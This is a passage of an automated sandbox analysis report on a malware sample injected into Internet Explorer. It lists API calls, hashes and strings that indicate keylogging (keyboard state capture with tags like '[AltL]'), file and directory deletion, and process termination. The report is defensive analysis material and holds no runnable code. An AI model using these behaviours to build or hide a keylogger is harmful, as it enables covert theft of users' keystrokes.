                                                    • Part of subcall function 02D7A41B: GetKeyState.USER32(00000010), ref: 02D7A46E
                                                    • Part of subcall function 02D7A41B: GetKeyboardState.USER32(?), ref: 02D7A479
                                                    • Part of subcall function 02D7A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 02D7A49C
                                                    • Part of subcall function 02D7A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 02D7A4FC
                                                    • Part of subcall function 02D7A671: SetEvent.KERNEL32(?,?,00000000,02D7B245,00000000), ref: 02D7A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                  • String ID: [AltL]$[AltR]
                                                  • API String ID: 2738857842-2658077756
                                                  • Opcode ID: aa8c307cc476ce4f14f382133be300be90a5c9887126812abae16b754a742449
                                                  • Instruction ID: 7f6238bb289760192418663bddaa0fcb4586fe4cc34e6a2063d9e46bdd0c1871
                                                  • Opcode Fuzzy Hash: aa8c307cc476ce4f14f382133be300be90a5c9887126812abae16b754a742449
                                                  • Instruction Fuzzy Hash: 88E09B21700691139858363C792E6BD2E12CB41B64F41014AE9838F794FA5E8D5587E6
                                                  APIs
                                                  • GetKeyState.USER32(00000012), ref: 02D7B6E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: State
                                                  • String ID: [CtrlL]$[CtrlR]
                                                  • API String ID: 1649606143-2446555240
                                                  • Opcode ID: 969a8f597a1987f4f7c17d257f1a91526d9c124dd78c96ccfc91d7690dedc5bd
                                                  • Instruction ID: 6d631a74ca57ece18f743d828e77d56a006415b94aac10f194821be033281bf7
                                                  • Opcode Fuzzy Hash: 969a8f597a1987f4f7c17d257f1a91526d9c124dd78c96ccfc91d7690dedc5bd
                                                  • Instruction Fuzzy Hash: 46E08621700715139528397D661E77D3A15C782B68F40015AE9C34B785EA6E8D1496E2
                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 02D7B8B1
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 02D7B8DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteDirectoryFileRemove
                                                  • String ID: pth_unenc
                                                  • API String ID: 3325800564-4028850238
                                                  • Opcode ID: 8b1e95824baabdf3ec69c7507632a458b28fc045fccb15d29ccc7689572c384e
                                                  • Instruction ID: 515b3116ec60cbd0b081eb147d99f1ca41c039c1bce89b03ebed6122a1a49ad7
                                                  • Opcode Fuzzy Hash: 8b1e95824baabdf3ec69c7507632a458b28fc045fccb15d29ccc7689572c384e
                                                  • Instruction Fuzzy Hash: 05E086324406124BD714BB30D854ADBB35DEF04315F504A5AD4D393350EF28DC49DAA0
                                                  APIs
                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,02D7F903), ref: 02D8289B
                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 02D828AE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ObjectProcessSingleTerminateWait
                                                  • String ID: pth_unenc
                                                  • API String ID: 1872346434-4028850238
                                                  • Opcode ID: 6d6dbb92278f6caefe9cd3b1d4675aad5105f7bed02aee4adbef4c2be2cfc3dc
                                                  • Instruction ID: e3c9cb5661eb190b4d7a6c71f428fbc0c84f5f6be9c4cab9be42b96c7e7e0039
                                                  • Opcode Fuzzy Hash: 6d6dbb92278f6caefe9cd3b1d4675aad5105f7bed02aee4adbef4c2be2cfc3dc
                                                  • Instruction Fuzzy Hash: 7CD0C9359C9613DBDB022A70AD5CB987B6CA705321F644B42BA61453E4CA294C75AA60
                                                  APIs
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D81BC7
                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 02D81C93
                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D81CB5
                                                  • SetLastError.KERNEL32(0000007E,02D81F2B), ref: 02D81CCC
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.3265605053.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D70000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_2d70000_iexplore.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastRead
                                                  • String ID:
                                                  • API String ID: 4100373531-0
                                                  • Opcode ID: 1b5318f492276039979807a77877e97836de26a16f32adee7c1aeff6b214b4b7
                                                  • Instruction ID: b48085adeb8bd21a5d762a13db05de6d3c0a0672cf07adae843c233a7f70f6de
                                                  • Opcode Fuzzy Hash: 1b5318f492276039979807a77877e97836de26a16f32adee7c1aeff6b214b4b7
                                                  • Instruction Fuzzy Hash: 1A415C716043069FE724AF19D984B66B7E8FF48718F10082DEA9AC7751EB31ED0ADB11